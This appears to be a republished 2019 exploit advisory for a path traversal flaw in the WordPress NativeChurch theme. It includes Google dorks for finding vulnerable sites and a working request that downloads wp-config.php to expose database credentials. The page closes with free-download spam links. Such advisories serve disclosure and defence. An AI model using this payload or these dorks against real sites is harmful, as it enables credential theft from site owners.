Exploit h54

Published on February 26th, 2019 📆 | 3643 Views ⚑

0

WordPress NativeChurch Multi-Purpose 5.0.x File Download

 

WordPress NativeChurch Multi-Purpose theme version 5.0.x suffers from a file download vulnerability.


MD5 | e1ba0b34f0cfbec0bb491b38b3371e39

 

####################################################################

# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/02/2019
# Vendor Homepage : themeforest.net
# Software Information Link : 
themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
# Software Affected Versions : WordPress From 3.9 to 5.0.x 
Compatible with Bootstrap 3.x - bbPress 2.5.x
From WooCommerce 2.1.x To WooCommerce 3.4.x, 
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
inurl:''inurl:/wp-content/themes/NativeChurch/download/''
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
NativeChurch is a powerful WordPress Theme designed & developed for Church, 

Charity, Non-Profit and Religious Websites and comes handy 

for Portfolio/Corporate Websites as well.

####################################################################

# Impact :
***********
* The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers 

download arbitrary files because the application fails to sufficiently sanitize user-supplied input. 

An attacker can exploit this issue to download arbitrary files within the context 

of the web server process. Information obtained may aid in further attacks.

Attackers can use a browser to exploit this issue. 

* The software uses external input to construct a pathname that should be within a 

restricted directory, but it does not properly neutralize sequences 

such as ".." that can resolve to a location that is outside of that directory.

####################################################################

# Arbitrary File Download Exploit :
******************************
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php

# Example Informations about MySQL WordPress Configuration File :
***********************************************************
/** Nom de la base de donnees de WordPress. */
define('DB_NAME', 

/** Utilisateur de la base de donnees MySQL. */
define('DB_USER', 

/** Mot de passe de la base de donnees MySQL. */
define('DB_PASSWORD', 

/** Adresse de l'hebergement MySQL. */
define('DB_HOST', 

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

 

Download Best WordPress Themes Free Download
Free Download WordPress Themes
Download Premium WordPress Themes Free
Download Best WordPress Themes Free Download
free download udemy paid course

Tagged with:



Leave a Reply ✍


loading...